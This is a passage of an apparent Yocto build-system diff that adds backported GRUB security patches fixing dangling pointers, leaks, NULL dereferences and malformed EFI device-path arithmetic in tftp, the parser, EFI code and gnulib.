15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/net/net.c | 9 +++++++--
18 1 file changed, 7 insertions(+), 2 deletions(-)
19
20diff --git a/grub-core/net/net.c b/grub-core/net/net.c
21index 38f19df..7c2cdf2 100644
22--- a/grub-core/net/net.c
23+++ b/grub-core/net/net.c
24@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
25
26 /* Add sender to cache table. */
27 if (card->link_layer_table == NULL)
28- card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
29- * sizeof (card->link_layer_table[0]));
30+ {
31+ card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
32+ * sizeof (card->link_layer_table[0]));
33+ if (card->link_layer_table == NULL)
34+ return;
35+ }
36+
37 entry = &(card->link_layer_table[card->new_ll_entry]);
38 entry->avail = 1;
39 grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
1From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 19 Feb 2021 17:12:23 +0000
4Subject: [PATCH] net/tftp: Fix dangling memory pointer
5
6The static code analysis tool, Parfait, reported that the valid of
7file->data was left referencing memory that was freed by the call to
8grub_free(data) where data was initialized from file->data.
9
10To ensure that there is no unintentional access to this memory
11referenced by file->data we should set the pointer to NULL.
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 grub-core/net/tftp.c | 1 +
20 1 file changed, 1 insertion(+)
21
22diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
23index 7d90bf6..f76b19f 100644
24--- a/grub-core/net/tftp.c
25+++ b/grub-core/net/tftp.c
26@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
27 }
28 destroy_pq (data);
29 grub_free (data);
30+ file->data = NULL;
31 return GRUB_ERR_NONE;
32 }
33
diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
1From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 22 Jan 2021 12:32:41 +0000
4Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
5
6After processing the command-line yet arriving at the point where we are
7setting argv, we are allocating memory, even if argc == 0, which makes
8no sense since we never put anything into the allocated argv.
9
10The solution is to simply return that we've successfully processed the
11arguments but that argc == 0, and also ensure that argv is NULL when
12we're not allocating anything in it.
13
14There are only 2 callers of this function, and both are handling a zero
15value in argc assuming nothing is allocated in argv.
16
17Fixes: CID 96680
18
19Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
20Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
21
22Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
23Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
24---
25 grub-core/kern/parser.c | 5 +++++
26 1 file changed, 5 insertions(+)
27
28diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
29index 619db31..d1cf061 100644
30--- a/grub-core/kern/parser.c
31+++ b/grub-core/kern/parser.c
32@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
33 int i;
34
35 *argc = 0;
36+ *argv = NULL;
37 do
38 {
39 if (!rd || !*rd)
40@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
41 (*argc)++;
42 }
43
44+ /* If there are no args, then we're done. */
45+ if (!*argc)
46+ return 0;
47+
48 /* Reserve memory for the return values. */
49 args = grub_malloc (bp - buffer);
50 if (!args)
diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
1From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
2From: Peter Jones <pjones@redhat.com>
3Date: Sun, 19 Jul 2020 16:53:27 -0400
4Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
5
6Several places we take the length of a device path and subtract 4 from
7it, without ever checking that it's >= 4. There are also cases where
8this kind of malformation will result in unpredictable iteration,
9including treating the length from one dp node as the type in the next
10node. These are all errors, no matter where the data comes from.
11
12This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
13can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
14return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
15the length is too small. Additionally, it makes several places in the
16code check for and return errors in these cases.
17
18Signed-off-by: Peter Jones <pjones@redhat.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20
21Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
22Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
23---
24 grub-core/kern/efi/efi.c | 64 +++++++++++++++++++++++++-----
25 grub-core/loader/efi/chainloader.c | 13 +++++-
26 grub-core/loader/i386/xnu.c | 9 +++--
27 include/grub/efi/api.h | 14 ++++---
28 4 files changed, 79 insertions(+), 21 deletions(-)
29
30diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
31index ad170c7..6a38080 100644
32--- a/grub-core/kern/efi/efi.c
33+++ b/grub-core/kern/efi/efi.c
34@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
35
36 dp = dp0;
37
38- while (1)
39+ while (dp)
40 {
41 grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
42 grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
43@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
44 if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
45 && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
46 {
47- grub_efi_uint16_t len;
48- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
49- / sizeof (grub_efi_char16_t));
50+ grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
51+
52+ if (len < 4)
53+ {
54+ grub_error (GRUB_ERR_OUT_OF_RANGE,
55+ "malformed EFI Device Path node has length=%d", len);
56+ return NULL;
57+ }
58+ len = (len - 4) / sizeof (grub_efi_char16_t);
59 filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
60 }
61
62@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
63 if (!name)
64 return NULL;
65
66- while (1)
67+ while (dp)
68 {
69 grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
70 grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
71@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
72
73 *p++ = '/';
74
75- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
76- / sizeof (grub_efi_char16_t));
77+ len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
78+ if (len < 4)
79+ {
80+ grub_error (GRUB_ERR_OUT_OF_RANGE,
81+ "malformed EFI Device Path node has length=%d", len);
82+ return NULL;
83+ }
84+
85+ len = (len - 4) / sizeof (grub_efi_char16_t);
86 fp = (grub_efi_file_path_device_path_t *) dp;
87 /* According to EFI spec Path Name is NULL terminated */
88 while (len > 0 && fp->path_name[len - 1] == 0)
89@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
90 ;
91 p = GRUB_EFI_NEXT_DEVICE_PATH (p))
92 {
93- total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
94+ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
95+
96+ /*
97+ * In the event that we find a node that's completely garbage, for
98+ * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
99+ * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
100+ * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
101+ * and neither should our consumers, but there won't be any error raised
102+ * even though the device path is junk.
103+ *
104+ * This keeps us from passing junk down back to our caller.
105+ */
106+ if (len < 4)
107+ {
108+ grub_error (GRUB_ERR_OUT_OF_RANGE,
109+ "malformed EFI Device Path node has length=%d", len);
110+ return NULL;
111+ }
112+
113+ total_size += len;
114 if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
115 break;
116 }
117@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
118 void
119 grub_efi_print_device_path (grub_efi_device_path_t *dp)
120 {
121- while (1)
122+ while (GRUB_EFI_DEVICE_PATH_VALID (dp))
123 {
124 grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
125 grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
126@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
127 /* Return non-zero. */
128 return 1;
129
130- while (1)
131+ if (dp1 == dp2)
132+ return 0;
133+
134+ while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
135 {
136 grub_efi_uint8_t type1, type2;
137 grub_efi_uint8_t subtype1, subtype2;
138@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
139 dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
140 }
141
142+ /*
143+ * There's no "right" answer here, but we probably don't want to call a valid
144+ * dp and an invalid dp equal, so pick one way or the other.
145+ */
146+ if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
147+ return 1;
148+ else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
149+ return -1;
150+
151 return 0;
152 }
153diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
154index daf8c6b..a8d7b91 100644
155--- a/grub-core/loader/efi/chainloader.c
156+++ b/grub-core/loader/efi/chainloader.c
157@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
158
159 size = 0;
160 d = dp;
161- while (1)
162+ while (d)
163 {
164- size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
165+ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
166+
167+ if (len < 4)
168+ {
169+ grub_error (GRUB_ERR_OUT_OF_RANGE,
170+ "malformed EFI Device Path node has length=%d", len);
171+ return NULL;
172+ }
173+
174+ size += len;
175 if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
176 break;
177 d = GRUB_EFI_NEXT_DEVICE_PATH (d);
178diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
179index b7d176b..c50cb54 100644
180--- a/grub-core/loader/i386/xnu.c
181+++ b/grub-core/loader/i386/xnu.c
182@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
183
184 devhead = buf;
185 buf = devhead + 1;
186- dpstart = buf;
187+ dp = dpstart = buf;
188
189- do
190+ while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
191 {
192- dp = buf;
193 buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
194+ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
195+ break;
196+ dp = buf;
197 }
198- while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
199
200 dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
201 - (char *) dpstart);
202diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
203index addcbfa..cf1355a 100644
204--- a/include/grub/efi/api.h
205+++ b/include/grub/efi/api.h
206@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
207 #define GRUB_EFI_DEVICE_PATH_TYPE(dp) ((dp)->type & 0x7f)
208 #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp) ((dp)->subtype)
209 #define GRUB_EFI_DEVICE_PATH_LENGTH(dp) ((dp)->length)
210+#define GRUB_EFI_DEVICE_PATH_VALID(dp) ((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
211
212 /* The End of Device Path nodes. */
213 #define GRUB_EFI_END_DEVICE_PATH_TYPE (0xff & 0x7f)
214@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
215 #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE 0x01
216
217 #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp) \
218- (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
219- && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
220- == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
221+ (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
222+ (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
223+ && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
224+ == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
225
226 #define GRUB_EFI_NEXT_DEVICE_PATH(dp) \
227- ((grub_efi_device_path_t *) ((char *) (dp) \
228- + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
229+ (GRUB_EFI_DEVICE_PATH_VALID (dp) \
230+ ? ((grub_efi_device_path_t *) \
231+ ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
232+ : NULL)
233
234 /* Hardware Device Path. */
235 #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE 1
diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
1From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 5 Nov 2020 10:15:25 +0000
4Subject: [PATCH] kern/efi: Fix memory leak on failure
5
6Free the memory allocated to name before returning on failure.
7
8Fixes: CID 296222
9
10Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
11Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
12
13Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
14Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
15---
16 grub-core/kern/efi/efi.c | 1 +
17 1 file changed, 1 insertion(+)
18
19diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
20index 6a38080..baeeef0 100644
21--- a/grub-core/kern/efi/efi.c
22+++ b/grub-core/kern/efi/efi.c
23@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
24 {
25 grub_error (GRUB_ERR_OUT_OF_RANGE,
26 "malformed EFI Device Path node has length=%d", len);
27+ grub_free (name);
28 return NULL;
29 }
30
diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
1From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 11 Dec 2020 15:03:13 +0000
4Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
5
6The model of grub_efi_get_memory_map() is that if memory_map is NULL,
7then the purpose is to discover how much memory should be allocated to
8it for the subsequent call.
9
10The problem here is that with grub_efi_is_finished set to 1, there is no
11check at all that the function is being called with a non-NULL memory_map.
12
13While this MAY be true, we shouldn't assume it.
14
15The solution to this is to behave as expected, and if memory_map is NULL,
16then don't try to use it and allow memory_map_size to be filled in, and
17return 0 as is done later in the code if the buffer is too small (or NULL).
18
19Additionally, drop unneeded ret = 1.
20
21Fixes: CID 96632
22
23Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
24Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
25
26Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
27Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
28---
29 grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
30 1 file changed, 14 insertions(+), 5 deletions(-)
31
32diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
33index b02fab1..5afcef7 100644
34--- a/grub-core/kern/efi/mm.c
35+++ b/grub-core/kern/efi/mm.c
36@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
37 if (grub_efi_is_finished)
38 {
39 int ret = 1;
40- if (*memory_map_size < finish_mmap_size)
41+
42+ if (memory_map != NULL)
43 {
44- grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
45- ret = 0;
46+ if (*memory_map_size < finish_mmap_size)
47+ {
48+ grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
49+ ret = 0;
50+ }
51+ else
52+ grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
53 }
54 else
55 {
56- grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
57- ret = 1;
58+ /*
59+ * Incomplete, no buffer to copy into, same as
60+ * GRUB_EFI_BUFFER_TOO_SMALL below.
61+ */
62+ ret = 0;
63 }
64 *memory_map_size = finish_mmap_size;
65 if (map_key)
diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
1From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Wed, 21 Oct 2020 14:41:27 +0000
4Subject: [PATCH] gnulib/regexec: Resolve unused variable
5
6This is a really minor issue where a variable is being assigned to but
7not checked before it is overwritten again.
8
9The reason for this issue is that we are not building with DEBUG set and
10this in turn means that the assert() that reads the value of the
11variable match_last is being processed out.
12
13The solution, move the assignment to match_last in to an ifdef DEBUG too.
14
15Fixes: CID 292459
16
17Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
18Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
19
20Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
21Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
22---
23 conf/Makefile.extra-dist | 1 +
24 .../lib/gnulib-patches/fix-unused-value.patch | 14 ++++++++++++++
25 2 files changed, 15 insertions(+)
26 create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
27
28diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
29index 46c4e95..9b01152 100644
30--- a/conf/Makefile.extra-dist
31+++ b/conf/Makefile.extra-dist
32@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
33 EXTRA_DIST += grub-core/genemuinitheader.sh
34
35 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
36+EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
37 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
38 EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
39
40diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
41new file mode 100644
42index 0000000..ba51f1b
43--- /dev/null
44+++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
45@@ -0,0 +1,14 @@
46+--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
47++++ b/lib/regexec.c 2020-10-21 14:32:07.961765604 +0000
48+@@ -828,7 +828,11 @@
49+ break;
50+ if (__glibc_unlikely (err != REG_NOMATCH))
51+ goto free_return;
52++#ifdef DEBUG
53++ /* Only used for assertion below when DEBUG is set, otherwise
54++ it will be over-written when we loop around. */
55+ match_last = -1;
56++#endif
57+ }
58+ else
59+ break; /* We found a match. */
diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
1From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 22 Oct 2020 13:54:06 +0000
4Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
5
6The code is assuming that the value of br_token.constraint was
7initialized to zero when it wasn't.
8
9While some compilers will ensure that, not all do, so it is better to
10fix this explicitly than leave it to chance.
11
12Fixes: CID 73749
13
14Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
15Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
18Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
19---
20 conf/Makefile.extra-dist | 1 +
21 .../lib/gnulib-patches/fix-uninit-structure.patch | 11 +++++++++++
22 2 files changed, 12 insertions(+)
23 create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
24
25diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
26index 9b01152..9e55458 100644
27--- a/conf/Makefile.extra-dist
28+++ b/conf/Makefile.extra-dist
29@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
30 EXTRA_DIST += grub-core/genemuinitheader.sh
31
32 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
33+EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
34 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
35 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
36 EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
37diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
38new file mode 100644
39index 0000000..7b4d9f6
40--- /dev/null
41+++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
42@@ -0,0 +1,11 @@
43+--- a/lib/regcomp.c 2020-10-22 13:49:06.770168928 +0000
44++++ b/lib/regcomp.c 2020-10-22 13:50:37.026528298 +0000
45+@@ -3662,7 +3662,7 @@
46+ Idx alloc = 0;
47+ #endif /* not RE_ENABLE_I18N */
48+ reg_errcode_t ret;
49+- re_token_t br_token;
50++ re_token_t br_token = {0};
51+ bin_tree_t *tree;
52+
53+ sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);
diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
1From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Wed, 28 Oct 2020 14:43:01 +0000
4Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
5
6All other instances of call to __argp_failure() where there is
7a dgettext() call is first checking whether state is NULL before
8attempting to dereference it to get the root_argp->argp_domain.
9
10Fixes: CID 292436
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 conf/Makefile.extra-dist | 1 +
19 .../lib/gnulib-patches/fix-null-state-deref.patch | 12 ++++++++++++
20 2 files changed, 13 insertions(+)
21 create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
22
23diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
24index 9e55458..96d7e69 100644
25--- a/conf/Makefile.extra-dist
26+++ b/conf/Makefile.extra-dist
27@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
28 EXTRA_DIST += grub-core/genemuinitheader.sh
29
30 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
31+EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
32 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
33 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
34 EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
35diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
36new file mode 100644
37index 0000000..813ec09
38--- /dev/null
39+++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
40@@ -0,0 +1,12 @@
41+--- a/lib/argp-help.c 2020-10-28 14:32:19.189215988 +0000
42++++ b/lib/argp-help.c 2020-10-28 14:38:21.204673940 +0000
43+@@ -145,7 +145,8 @@
44+ if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
45+ {
46+ __argp_failure (state, 0, 0,
47+- dgettext (state->root_argp->argp_domain,
48++ dgettext (state == NULL ? NULL
49++ : state->root_argp->argp_domain,
50+ "\
51+ ARGP_HELP_FMT: %s value is less than or equal to %s"),
52+ "rmargin", up->name);
diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
1From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 5 Nov 2020 10:57:14 +0000
4Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
5
6It appears to be possible that the mctx->state_log field may be NULL,
7and the name of this function, clean_state_log_if_needed(), suggests
8that it should be checking that it is valid to be cleaned before
9assuming that it does.
10
11Fixes: CID 86720
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
15
16Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
17Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
18---
19 conf/Makefile.extra-dist | 1 +
20 .../lib/gnulib-patches/fix-regexec-null-deref.patch | 12 ++++++++++++
21 2 files changed, 13 insertions(+)
22 create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
23
